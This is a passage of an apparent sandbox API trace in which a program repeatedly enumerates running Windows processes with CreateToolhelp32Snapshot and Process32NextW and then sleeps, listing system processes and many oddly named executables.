th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0103.776] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0103.777] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0103.778] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0103.778] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0103.779] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0103.779] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0103.780] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0103.781] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.782] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.782] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.783] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.831] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.832] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0103.832] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.833] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.834] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0103.835] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.836] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0103.837] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0103.838] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0103.839] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0103.840] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.842] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0103.843] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0103.844] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0103.845] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0103.846] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0103.847] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0103.849] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0103.850] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0103.851] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0103.852] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0103.853] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0103.854] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0103.855] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0103.856] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0103.857] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0103.858] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0103.860] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0103.861] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0103.862] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0103.863] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0103.940] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0103.941] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.942] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0103.943] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0103.944] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbe8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbbc, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0103.945] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0103.946] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0103.947] CloseHandle (hObject=0xbc) returned 1 [0103.947] Sleep (dwMilliseconds=0x12c) [0104.306] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0104.311] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0104.311] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0104.312] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0104.313] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0104.313] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0104.314] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0104.315] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0104.315] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0104.316] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0104.317] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0104.317] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.318] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.319] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.319] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.320] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.321] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0104.321] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.322] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.322] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0104.324] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.325] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0104.326] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0104.327] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0104.328] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0104.329] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.330] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0104.332] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0104.333] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0104.334] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0104.335] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0104.336] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0104.337] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0104.338] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, 